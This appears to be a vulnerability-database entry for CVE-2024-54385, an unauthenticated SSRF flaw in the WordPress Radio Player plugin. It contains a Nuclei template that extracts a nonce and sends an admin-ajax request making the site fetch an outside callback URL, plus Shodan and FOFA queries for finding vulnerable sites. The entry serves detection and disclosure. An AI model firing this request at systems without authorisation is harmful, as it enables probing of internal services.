Radio Player versions up to 2.0.82 are vulnerable to Server-Side Request Forgery attacks.
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
Cvelist | CVE-2024-54385 WordPress Radio Player plugin <= 2.0.82 - Server Side Request Forgery (SSRF) vulnerability | 16 Dec 202414:31 | – | cvelist |
CVE | CVE-2024-54385 | 16 Dec 202415:15 | – | cve |
Vulnrichment | CVE-2024-54385 WordPress Radio Player plugin <= 2.0.82 - Server Side Request Forgery (SSRF) vulnerability | 16 Dec 202414:31 | – | vulnrichment |
NVD | CVE-2024-54385 | 16 Dec 202415:15 | – | nvd |
0day.today | WordPress Radio Player 2.0.82 Server-Side Request Forgery Vulnerability | 2 Jan 202500:00 | – | zdt |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (December 9, 2024 to December 15, 2024) | 19 Dec 202417:13 | – | wordfence |
id: CVE-2024-54385
info:
name: Radio Player <= 2.0.82 - Server-Side Request Forgery
author: s4e-io
severity: high
description: |
The Radio Player Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.
reference:
- https://patchstack.com/database/wordpress/plugin/radio-player/vulnerability/wordpress-radio-player-plugin-2-0-82-server-side-request-forgery-ssrf-vulnerability?_s_id=cve
- https://github.com/RandomRobbieBF/CVE-2024-54385
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/radio-player/radio-player-2082-unauthenticated-server-side-request-forgery
- https://nvd.nist.gov/vuln/detail/CVE-2024-54385
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-54385
cwe-id: CWE-918
epss-score: 0.00043
epss-percentile: 0.11007
metadata:
verified: true
max-request: 2
vendor: softLab
product: radio-player
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/radio-player"
fofa-query: body="/wp-content/plugins/radio-player"
tags: cve,cve2024,wordpress,wp,wp-plugin,radio-player,ssrf
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/radio-player")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- '"nonce":"([a-z0-9]+)",\s*"isPro"'
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=radio_player_get_stream_data&nonce={{nonce}}&utm_source=&url=http://{{interactsh-url}}/live.m3u8
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
- 'contains(body, "success\":true")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100fa03151e9a3e73f2fe6a7aa3ed449eef4344a8f47e00ff11ecadcef15d91d0d8022100f1310f4e3ce780f3d0265bef355638531d9cc5b9e56e405bb535ab968a779187:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo